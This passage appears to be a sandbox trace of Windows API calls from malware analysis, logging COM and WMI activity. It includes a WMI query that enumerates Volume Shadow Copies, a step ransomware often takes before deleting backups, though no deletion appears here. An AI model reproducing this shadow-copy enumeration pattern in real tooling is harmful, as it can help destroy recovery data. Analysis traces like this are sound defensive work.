[1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d748 | out: ppvObject=0x1c90d748*=0x1b92e6b0) returned 0x0 [0104.914] WbemLocator:IClientSecurity:SetBlanket (This=0x1b92e6b0, pProxy=0x1be444f8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0104.914] WbemLocator:IUnknown:Release (This=0x1b92e6b0) returned 0x2 [0104.914] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x1 [0104.914] CoTaskMemFree (pv=0x1b921750) [0104.914] WbemLocator:IUnknown:Release (This=0x1be41720) returned 0x0 [0104.915] WbemLocator:IUnknown:QueryInterface (in: This=0x1be444f8, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d430 | out: ppvObject=0x1c90d430*=0x1b92e6f0) returned 0x0 [0104.916] WbemLocator:IUnknown:QueryInterface (in: This=0x1b92e6f0, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90d4b0 | out: ppvObject=0x1c90d4b0*=0x0) returned 0x80004002 [0104.917] WbemLocator:IUnknown:QueryInterface (in: This=0x1b92e6f0, riid=0x7fef2d6d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90d248 | out: ppvObject=0x1c90d248*=0x0) returned 0x80004002 [0104.919] WbemLocator:IUnknown:AddRef (This=0x1b92e6f0) returned 0x3 [0104.919] CoGetContextToken (in: pToken=0x1c90d100 | out: pToken=0x1c90d100) returned 0x0 [0104.919] WbemLocator:IUnknown:QueryInterface (in: This=0x1b92e6f0, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d0c0 | out: ppvObject=0x1c90d0c0*=0x1b92e5d8) returned 0x0 [0104.920] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b92e5d8, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90d0f0 | out: pCid=0x1c90d0f0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0104.920] WbemLocator:IUnknown:Release (This=0x1b92e5d8) returned 0x3 [0104.920] CoGetContextToken (in: pToken=0x1c90d0d0 | out: pToken=0x1c90d0d0) returned 0x0 [0104.920] WbemLocator:IUnknown:AddRef (This=0x1b92e6f0) returned 0x4 [0104.920] WbemLocator:IUnknown:QueryInterface (in: This=0x1b92e6f0, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d1e8 | out: ppvObject=0x1c90d1e8*=0x1b92e6c0) returned 0x0 [0104.921] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x4 [0104.921] WbemLocator:IRpcOptions:Query (in: This=0x1b92e6c0, pPrx=0x1b92e6f0, dwProperty=2, pdwValue=0x1c90d258 | out: pdwValue=0x1c90d258) returned 0x80004002 [0104.921] WbemLocator:IUnknown:Release (This=0x1b92e6c0) returned 0x3 [0104.925] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x2 [0104.925] CoGetContextToken (in: pToken=0x1c90d5d0 | out: pToken=0x1c90d5d0) returned 0x0 [0104.925] CoGetContextToken (in: pToken=0x1c90d510 | out: pToken=0x1c90d510) returned 0x0 [0104.925] WbemLocator:IUnknown:AddRef (This=0x1b92e6f0) returned 0x3 [0104.925] WbemLocator:IUnknown:QueryInterface (in: This=0x1b92e6f0, riid=0x1c90d650*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1c90d630 | out: ppvObject=0x1c90d630*=0x1be444f8) returned 0x0 [0104.925] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x3 [0104.926] WbemLocator:IUnknown:Release (This=0x1be444f8) returned 0x2 [0104.932] WbemLocator:IUnknown:Release (This=0x1be444f8) returned 0x1 [0104.933] CoGetContextToken (in: pToken=0x1c90dbd0 | out: pToken=0x1c90dbd0) returned 0x0 [0104.933] WbemLocator:IUnknown:AddRef (This=0x1b92e6f0) returned 0x2 [0104.934] WbemLocator:IUnknown:QueryInterface (in: This=0x1b92e6f0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d7a0 | out: ppvObject=0x1c90d7a0*=0x1b92e6f0) returned 0x0 [0104.934] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x2 [0104.934] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x1 [0104.935] CoGetContextToken (in: pToken=0x1c90d870 | out: pToken=0x1c90d870) returned 0x0 [0104.935] CoGetContextToken (in: pToken=0x1c90d7b0 | out: pToken=0x1c90d7b0) returned 0x0 [0104.935] WbemLocator:IUnknown:AddRef (This=0x1b92e6f0) returned 0x2 [0104.935] WbemLocator:IUnknown:QueryInterface (in: This=0x1b92e6f0, riid=0x1c90d8f0*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1c90d8d0 | out: ppvObject=0x1c90d8d0*=0x1be444f8) returned 0x0 [0104.935] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x2 [0104.935] WbemLocator:IUnknown:AddRef (This=0x1be444f8) returned 0x3 [0104.935] IWbemServices:ExecQuery (in: This=0x1be444f8, strQueryLanguage="WQL", strQuery="select * from Win32_Shadowcopy", lFlags=16, pCtx=0x0, ppEnum=0x1c90dd68 | out: ppEnum=0x1c90dd68*=0x1be445f8) returned 0x0 [0104.955] IUnknown:QueryInterface (in: This=0x1be445f8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d978 | out: ppvObject=0x1c90d978*=0x1be44600) returned 0x0 [0104.956] IClientSecurity:QueryBlanket (in: This=0x1be44600, pProxy=0x1be445f8, pAuthnSvc=0x1c90d970, pAuthzSvc=0x1c90d96c, pServerPrincName=0x1c90d998, pAuthnLevel=0x1c90d968, pImpLevel=0x1c90d984, pAuthInfo=0x1c90d9a8, pCapabilites=0x1c90d980 | out: pAuthnSvc=0x1c90d970*=0xa, pAuthzSvc=0x1c90d96c*=0x0, pServerPrincName=0x1c90d998, pAuthnLevel=0x1c90d968*=0x6, pImpLevel=0x1c90d984*=0x2, pAuthInfo=0x1c90d9a8, pCapabilites=0x1c90d980*=0x1) returned 0x0 [0104.956] IUnknown:Release (This=0x1be44600) returned 0x1 [0104.956] IUnknown:QueryInterface (in: This=0x1be445f8, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d918 | out: ppvObject=0x1c90d918*=0x1b913770) returned 0x0 [0104.956] IUnknown:QueryInterface (in: This=0x1be445f8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d8a8 | out: ppvObject=0x1c90d8a8*=0x1be44600) returned 0x0 [0104.956] IClientSecurity:SetBlanket (This=0x1be44600, pProxy=0x1be445f8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0104.973] IUnknown:Release (This=0x1be44600) returned 0x2 [0104.973] WbemLocator:IUnknown:Release (This=0x1b913770) returned 0x1 [0104.973] CoTaskMemFree (pv=0x1b921780) [0104.973] IUnknown:QueryInterface (in: This=0x1be445f8, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d550 | out: ppvObject=0x1c90d550*=0x1b913770) returned 0x0 [0104.973] WbemLocator:IUnknown:QueryInterface (in: This=0x1b913770, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90d5d0 | out: ppvObject=0x1c90d5d0*=0x0) returned 0x80004002 [0104.974] WbemLocator:IUnknown:QueryInterface (in: This=0x1b913770, riid=0x7fef2d6d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90d368 | out: ppvObject=0x1c90d368*=0x0) returned 0x80004002 [0104.974] WbemLocator:IUnknown:AddRef (This=0x1b913770) returned 0x3 [0104.974] CoGetContextToken (in: pToken=0x1c90d220 | out: pToken=0x1c90d220) returned 0x0 [0104.975] WbemLocator:IUnknown:QueryInterface (in: This=0x1b913770, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d1e0 | out: ppvObject=0x1c90d1e0*=0x1b913658) returned 0x0 [0104.975] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b913658, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90d210 | out: pCid=0x1c90d210*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0104.975] WbemLocator:IUnknown:Release (This=0x1b913658) returned 0x3 [0104.975] CoGetContextToken (in: pToken=0x1c90d1f0 | out: pToken=0x1c90d1f0) returned 0x0 [0104.975] WbemLocator:IUnknown:AddRef (This=0x1b913770) returned 0x4 [0104.975] WbemLocator:IUnknown:QueryInterface (in: This=0x1b913770, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d308 | out: ppvObject=0x1c90d308*=0x1b913740) returned 0x0 [0104.975] WbemLocator:IUnknown:Release (This=0x1b913770) returned 0x4 [0104.975] WbemLocator:IRpcOptions:Query (in: This=0x1b913740, pPrx=0x1b913770, dwProperty=2, pdwValue=0x1c90d378 | out: pdwValue=0x1c90d378) returned 0x80004002 [0104.975] WbemLocator:IUnknown:Release (This=0x1b913740) returned 0x3 [0104.976] WbemLocator:IUnknown:Release (This=0x1b913770) returned 0x2 [0104.976] CoGetContextToken (in: pToken=0x1c90d6f0 | out: pToken=0x1c90d6f0) returned 0x0 [0104.976] CoGetContextToken (in: pToken=0x1c90d630 | out: pToken=0x1c90d630) returned 0x0 [0104.976] WbemLocator:IUnknown:AddRef (This=0x1b913770) returned 0x3 [0104.976] WbemLocator:IUnknown:QueryInterface (in: This=0x1b913770, riid=0x1c90d770*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c90d750 | out: ppvObject=0x1c90d750*=0x1be445f8) returned 0x0 [0104.976] WbemLocator:IUnknown:Release (This=0x1b913770) returned 0x3 [0104.976] IUnknown:Release (This=0x1be445f8) returned 0x2 [0104.976] IUnknown:Release (This=0x1be445f8) returned 0x1 [0104.977] WbemLocator:IUnknown:Release (This=0x1be444f8) returned 0x2 [0104.977] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90dd10 | out: puCount=0x1c90dd10*=0x2) returned 0x0 [0104.977] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90dd10*=0x0, pszText=0x0 | out: puBuffLength=0x1c90dd10*=0x17, pszText=0x0) returned 0x0 [0104.977] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90dd10*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90dd10*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0104.984] CoGetContextToken (in: pToken=0x1c90d910 | out: pToken=0x1c90d910) returned 0x0 [0104.984] CoGetContextToken (in: pToken=0x1c90d850 | out: pToken=0x1c90d850) returned 0x0 [0104.984] WbemLocator:IUnknown:AddRef (This=0x1b913770) returned 0x2 [0104.984] WbemLocator:IUnknown:QueryInterface (in: This=0x1b913770, riid=0x1c90d990*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c90d970 | out: ppvObject=0x1c90d970*=0x1be445f8) returned 0x0 [0104.984] WbemLocator:IUnknown:Release (This=0x1b913770) returned 0x2 [0104.985] IUnknown:AddRef (This=0x1be445f8) returned 0x3 [0104.985] IEnumWbemClassObject:Clone (in: This=0x1be445f8, ppEnum=0x1c90ddd0 | out: ppEnum=0x1c90ddd0*=0x1be44788) returned 0x0 [0104.986] IUnknown:QueryInterface (in: This=0x1be44788, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90da28 | out: ppvObject=0x1c90da28*=0x1be44790) returned 0x0 [0104.986] IClientSecurity:QueryBlanket (in: This=0x1be44790, pProxy=0x1be44788, pAuthnSvc=0x1c90da20, pAuthzSvc=0x1c90da1c, pServerPrincName=0x1c90da48, pAuthnLevel=0x1c90da18, pImpLevel=0x1c90da34, pAuthInfo=0x1c90da58, pCapabilites=0x1c90da30 | out: pAuthnSvc=0x1c90da20*=0xa, pAuthzSvc=0x1c90da1c*=0x0, pServerPrincName=0x1c90da48, pAuthnLevel=0x1c90da18*=0x6, pImpLevel=0x1c90da34*=0x2, pAuthInfo=0x1c90da58, pCapabilites=0x1c90da30*=0x1) returned 0x0 [0104.986] IUnknown:Release (This=0x1be44790) returned 0x1 [0104.987] IUnknown:QueryInterface (in: This=0x1be44788, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d9c8 | out: ppvObject=0x1c90d9c8*=0x1b922160) returned 0x0 [0104.987] IUnknown:QueryInterface (in: This=0x1be44788, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d958 | out: ppvObject=0x1c90d958*=0x1be44790) returned 0x0 [0104.987] IClientSecurity:SetBlanket (This=0x1be44790, pProxy=0x1be44788, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0104.988] IUnknown:Release (This=0x1be44790) returned 0x2 [0104.988] WbemLocator:IUnknown:Release (This=0x1b922160) returned 0x1 [0104.988] CoTaskMemFree (pv=0x1b9217b0) [0104.989] IUnknown:QueryInterface (in: This=0x1be44788, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d5f0 | out: ppvObject=0x1c90d5f0*=0x1b922160) returned 0x0 [0104.989] WbemLocator:IUnknown:QueryInterface (in: This=0x1b922160, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90d670 | out: ppvObject=0x1c90d670*=0x0) returned 0x80004002 [0104.989] WbemLocator:IUnknown:QueryInterface (in: This=0x1b922160, riid=0x7fef2d6d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90d408 | out: ppvObject=0x1c90d408*=0x0) returned 0x80004002 [0104.990] WbemLocator:IUnknown:AddRef (This=0x1b922160) returned 0x3 [0104.990] CoGetContextToken (in: pToken=0x1c90d2c0 | out: pToken=0x1c90d2c0) returned 0x0 [0104.990] WbemLocator:IUnknown:QueryInterface (in: This=0x1b922160, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d280 | out: ppvObject=0x1c90d280*=0x1b922048) returned 0x0 [0104.991] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b922048, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90d2b0 | out: pCid=0x1c90d2b0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0104.991] WbemLocator:IUnknown:Release (This=0x1b922048) returned 0x3 [0104.991] CoGetContextToken (in: pToken=0x1c90d290 | out: pToken=0x1c90d290) returned 0x0 [0104.991] WbemLocator:IUnknown:AddRef (This=0x1b922160) returned 0x4 [0104.991] WbemLocator:IUnknown:QueryInterface (in: This=0x1b922160, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d3a8 | out: ppvObject=0x1c90d3a8*=0x1b922130) returned 0x0 [0104.991] WbemLocator:IUnknown:Release (This=0x1b922160) returned 0x4 [0104.991] WbemLocator:IRpcOptions:Query (in: This=0x1b922130, pPrx=0x1b922160, dwProperty=2, pdwValue=0x1c90d418 | out: pdwValue=0x1c90d418) returned 0x80004002 [0104.991] WbemLocator:IUnknown:Release (This=0x1b922130) returned 0x3 [0104.992] WbemLocator:IUnknown:Release (This=0x1b922160) returned 0x2 [0104.992] CoGetContextToken (in: pToken=0x1c90d790 | out: pToken=0x1c90d790) returned 0x0 [0104.992] CoGetContextToken (in: pToken=0x1c90d6d0 | out: pToken=0x1c90d6d0) returned 0x0 [0104.992] WbemLocator:IUnknown:AddRef (This=0x1b922160) returned 0x3 [0104.992] WbemLocator:IUnknown:QueryInterface (in: This=0x1b922160, riid=0x1c90d810*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c90d7f0 | out: ppvObject=0x1c90d7f0*=0x1be44788) returned 0x0 [0104.992] WbemLocator:IUnknown:Release (This=0x1b922160) returned 0x3 [0104.992] IUnknown:Release (This=0x1be44788) returned 0x2 [0104.992] IUnknown:Release (This=0x1be44788) returned 0x1 [0104.992] IUnknown:Release (This=0x1be445f8) returned 0x2 [0104.999] CoGetContextToken (in: pToken=0x1c90db90 | out: pToken=0x1c90db90) returned 0x0 [0104.999] CoGetContextToken (in: pToken=0x1c90dad0 | out: pToken=0x1c90dad0) returned 0x0 [0104.999] WbemLocator:IUnknown:AddRef (This=0x1b922160) returned 0x2 [0105.000] WbemLocator:IUnknown:QueryInterface (in: This=0x1b922160, riid=0x1c90dc10*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c90dbf0 | out: ppvObject=0x1c90dbf0*=0x1be44788) returned 0x0 [0105.000] WbemLocator:IUnknown:Release (This=0x1b922160) returned 0x2 [0105.000] IUnknown:AddRef (This=0x1be44788) returned 0x3 [0105.000] IEnumWbemClassObject:Reset (This=0x1be44788) returned 0x0 [0105.225] IUnknown:Release (This=0x1be44788) returned 0x2 [0105.233] CoTaskMemAlloc (cb=0x8) returned 0x1b8e8180 [0105.249] IEnumWbemClassObject:Next (in: This=0x1be44788, lTimeout=-1, uCount=0x1, apObjects=0x1b8e8180, puReturned=0x1c90de18 | out: apObjects=0x1b8e8180*=0x1be44830, puReturned=0x1c90de18*=0x1) returned 0x0 [0108.676] IUnknown:QueryInterface (in: This=0x1be44830, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d140 | out: ppvObject=0x1c90d140*=0x1be44830) returned 0x0 [0108.676] IUnknown:QueryInterface (in: This=0x1be44830, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90d1c0 | out: ppvObject=0x1c90d1c0*=0x0) returned 0x80004002 [0108.676] IUnknown:QueryInterface (in: This=0x1be44830, riid=0x7fef2d6d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90cf58 | out: ppvObject=0x1c90cf58*=0x0) returned 0x80004002 [0108.677] IUnknown:AddRef (This=0x1be44830) returned 0x3 [0108.677] CoGetContextToken (in: pToken=0x1c90ce10 | out: pToken=0x1c90ce10) returned 0x0 [0108.677] IUnknown:QueryInterface (in: This=0x1be44830, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cdd0 | out: ppvObject=0x1c90cdd0*=0x1be44838) returned 0x0 [0108.677] IMarshal:GetUnmarshalClass (in: This=0x1be44838, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90ce00 | out: pCid=0x1c90ce00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0108.677] IUnknown:Release (This=0x1be44838) returned 0x3 [0108.677] CoGetContextToken (in: pToken=0x1c90cde0 | out: pToken=0x1c90cde0) returned 0x0 [0108.677] IUnknown:AddRef (This=0x1be44830) returned 0x4 [0108.677] IUnknown:QueryInterface (in: This=0x1be44830, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cef8 | out: ppvObject=0x1c90cef8*=0x0) returned 0x80004002 [0108.677] IUnknown:Release (This=0x1be44830) returned 0x3 [0108.678] IUnknown:Release (This=0x1be44830) returned 0x2 [0108.678] CoGetContextToken (in: pToken=0x1c90d2a0 | out: pToken=0x1c90d2a0) returned 0x0 [0108.678] CoGetContextToken (in: pToken=0x1c90d1e0 | out: pToken=0x1c90d1e0) returned 0x0 [0108.678] IUnknown:AddRef (This=0x1be44830) returned 0x3 [0108.678] IUnknown:QueryInterface (in: This=0x1be44830, riid=0x1c90d320*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c90d300 | out: ppvObject=0x1c90d300*=0x1be44830) returned 0x0 [0108.678] IUnknown:Release (This=0x1be44830) returned 0x3 [0108.678] IUnknown:Release (This=0x1be44830) returned 0x2 [0108.679] IUnknown:Release (This=0x1be44830) returned 0x1 [0108.679] CoTaskMemFree (pv=0x1b8e8180) [0108.679] CoGetContextToken (in: pToken=0x1c90dc20 | out: pToken=0x1c90dc20) returned 0x0 [0108.679] IUnknown:AddRef (This=0x1be44830) returned 0x2 [0108.685] IWbemClassObject:Get (in: This=0x1be44830, wszName="__GENUS", lFlags=0, pVal=0x1c90dd90*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90dd8c*=0, plFlavor=0x1c90dd88*=0 | out: pVal=0x1c90dd90*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c90dd8c*=3, plFlavor=0x1c90dd88*=64) returned 0x0 [0108.692] IWbemClassObject:Get (in: This=0x1be44830, wszName="__PATH", lFlags=0, pVal=0x1c90dd30*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90dd2c*=0, plFlavor=0x1c90dd28*=0 | out: pVal=0x1c90dd30*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}\"", varVal2=0x0), pType=0x1c90dd2c*=8, plFlavor=0x1c90dd28*=64) returned 0x0 [0108.692] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}\"") returned 0x53 [0108.692] CoGetObjectContext (in: riid=0x1c90dcc8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90dcc0 | out: ppv=0x1c90dcc0*=0x142498) returned 0x0 [0108.692] IComThreadingInfo:GetCurrentApartmentType (in: This=0x142498, pAptType=0x1c90dce0 | out: pAptType=0x1c90dce0*=1) returned 0x0 [0108.692] IUnknown:QueryInterface (in: This=0x142498, riid=0x30db210*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c90dde8 | out: 